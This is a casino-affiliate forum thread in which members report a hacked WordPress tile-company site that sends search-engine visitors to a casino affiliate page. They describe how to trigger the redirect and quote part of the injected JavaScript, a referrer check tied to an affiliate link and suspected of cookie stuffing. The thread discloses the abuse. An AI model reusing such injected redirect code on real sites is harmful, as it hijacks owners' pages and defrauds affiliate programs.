SlotoCash on WP Hacker's Page

Deckmedia Affiliates

AussieDave

24 years & still going!
Joined
Nov 28, 2013
Messages
4,978
Reaction score
3,518
Worse though, this low life scum bag hacker, is using my Brand Name (title and description), and has subsequently hacked a site, and populated it with a crap load of links, and again used my Brand Name upteen dozen times in the text.

You'll need to use the Google Cache (to see the hack)...

google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwjqiJLhst7WAhUHObwKHbtxDXEQFggmMAA&url=http%3A%2F%2Fwww.bgtinteriorsolutions.com%2Fclient-portal&usg=AOvVaw120Q7RPMQZdwLCANB0WDPB

Without the Cache, bgtinteriorsolutions.com/client-portal redirects to the "hacker's site: top-trustedcasinos.com

I was under the impressing the hacker account got closed last year some time, least that's what we go told here at AGD. How has this hacker managed to gain another DeckMedia aff account???!!!
 

NoLuckNeeded

Affiliate Guard Dog Member
Joined
Aug 5, 2007
Messages
209
Reaction score
58
monkey.gif
 

Bonus Paradise

Affiliate Guard Dog Member
Joined
Mar 30, 2008
Messages
776
Reaction score
131
bgtinteriorsolutions.com/client-portal redirects to the "hacker's site: top-trustedcasinos.com
Does not redirect me.

You'll need to use the Google Cache (to see the hack)...

google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwjqiJLhst7WAhUHObwKHbtxDXEQFggmMAA&url=http%3A%2F%2Fwww.bgtinteriorsolutions.com%2Fclient-portal&usg=AOvVaw120Q7RPMQZdwLCANB0WDPB
Thing with these hacked pages is, that they are geotargeted.
I am there and see a few lines content in dutch and 2 casinos (Bob Casino and Play Amo)

Some other countries may see SlotoCash
 

Shay

Affiliate Guard Dog Member
Joined
Nov 27, 2011
Messages
188
Reaction score
179
Please note this is one account, they are campaign IDs.

Please can you explain where the hack is?

Thanks for your assistance.

See the original post for details of location of the "hack".
 

Engineer

Super Moderator
Joined
Dec 14, 2006
Messages
3,210
Reaction score
400
To see the hack in action, you have to visit bgtinteriorsolutions.com/client-portal (or any of the hacked URLs from that site) by clicking to it from the Google search results. If you go there directly, it does not redirect. Try this:

1. Go to Google, type this into the search bar:

site:bgtinteriorsolutions.com

2. Scroll down and look at the titles of the search results. This website is not a casino website -- yet there are titles related to casinos (these are the hacked pages). Click any title that mentions a casino.

3. As soon as you click, you are redirected to top-trustedcasinos.com

4. Click the link to SlotoCash. After doing that, in my Chrome cookies, I found this affid for SlotoCash: 15140
 

AussieDave

24 years & still going!
Joined
Nov 28, 2013
Messages
4,978
Reaction score
3,518
Yes Engineer is correct, ty :)

I must have accidently screwed up the Google cache link, sorry about that. Here is the correct link (it displayed the hacked content - along with my Brand Name used a zillion times):
http://webcache.googleusercontent.c...s.com/client-portal+&cd=7&hl=en&ct=clnk&gl=nz

NB - bgtinteriorsolutions, is a tile company located in the USA. Their site using WordPress. It has been hacked by your affiliate, Paul.

Very sneaky hack... If you visit bgtinteriorsolutions.com, and click on the Navigation Link - CLIENTS > CLIENT PORTAL (hxxp://bgtinteriorsolutions.com/client-portal) it will display the correct page.

However, this hack works by identifying a person use a SE, when that happens, hxxp://bgtinteriorsolutions.com/client-portal, redirects to: top-trustedcasinos.com


In the source code of that page is some funky script:
Code:
<script>
    (function() {
 
    /*alert('http://deckaffiliates.com/c/324590  ');*/
    /*console.log('http://deckaffiliates.com/c/324590  ');*/
    var aim_url         = 'http://deckaffiliates.com/c/324590  '.replace(/&amp;/g,'&');
    var SID             = "3565754fb6af92d36e8dd5def6f54130";
    function extractQuery()
    {
        var url         = [];
        var param       = [];
        url[0]          = "www.google.com";     param[0]        = "q";
        url[1]          = "search.yahoo.com";   param[1]        = "p";
        url[2]          = "www.bing.com";       param[2]        = "q";
        url[3]          = "www.google.";        param[3]        = "q";
        url[4]          = "www.ask.com";        param[4]        = "q";
        url[5]          = "search.live.com";    param[5]        = "q";
        url[6]          = "www.altavista.com";  param[6]        = "q";
        url[7]          = "search.aol.com";     param[7]        = "query";
        url[8]          = "yandex.ru";          param[8]        = "text";
        var ref         = document.referrer;

And other stuff which, to me, looking like this hacker is cookie stuffing with a hidden iframe... Class act this piece of crap is.

How about you release his details Paul, NO criminal deserve to be protected by Privacy, when they hack people's site, and use Brand Name(s) for illegal purposes.
 
Last edited:

AussieDave

24 years & still going!
Joined
Nov 28, 2013
Messages
4,978
Reaction score
3,518
As I've said before, the BIG problem isn't Wordpress per se, it's the fact that most people who use it, are not webmasters.

Hence, they are totally clueless about security, updates and plugin vulnerabilities etc. This sheer lack of expertise, has been a blessing for the "hacker(s)" - it's akin to shooting fish in a barrel...

At an educated guess, 99% these WP hacks are being done via theme/plugin vulnerabilities, or at the very least people not changing the login from Admin, and using a dumb password (mycatbob - which could be easily hacked).

Edit:
Only have to pull up your server's raw log file, and you'll see hundreds of probing instances, seeking specific WP plugins/themes.

Way back in 2009 WP used to be very diligent about allowing plugin/themes on the WP repository. Now, well I guess it's hard to do that with so many around.
 
Last edited:

admin

Notification Admin
Staff member
Joined
Dec 17, 2006
Messages
6,960
Reaction score
7
A reminder is sent to all affiliate managers.
 

Deckmedia Affiliates
INFO

  1. AGD Terms Certification:
    Terms and Conditions
  2. Have Retroactively Changed T&C's?
    No
  3. Have Negative Carryover?
    No
  4. Are Casino Earnings Bundled?
    No
  5. Missing Admin Fee:
    No
  6. Ambiguous Termination Clause:
    No
  7. T&C updates not emailed:
    No

AGD REPRESENTATIVE

AGD AUDIT RESULTS

25% = 25%
30% = 30%
35% = 35%
40% = 40%
45% = 45%

More info

Featured resources

  • Nifty Stats
    Nifty Stats
    stats tracking, casino stats. casino stats tracking, gambling stats, casino tracking, stats remote
    • woltran
    • Updated:
  • Slots Launch
    Slots Launch
    Free Demo Games for Casino Affiliates
    • Guard Dog
    • Updated:
  • TrafficStars
    TrafficStars
    Self-Serve ad Network
    • Guard Dog
    • Updated:
  • StatsDrone
    AGD Approved StatsDrone
    iGaming Affiliate Program Stats Tracker
    • Guard Dog
    • Updated:
  • The Affiliate Agency
    The Affiliate Agency
    The Affiliate Agency
    • Guard Dog
    • Updated:
Top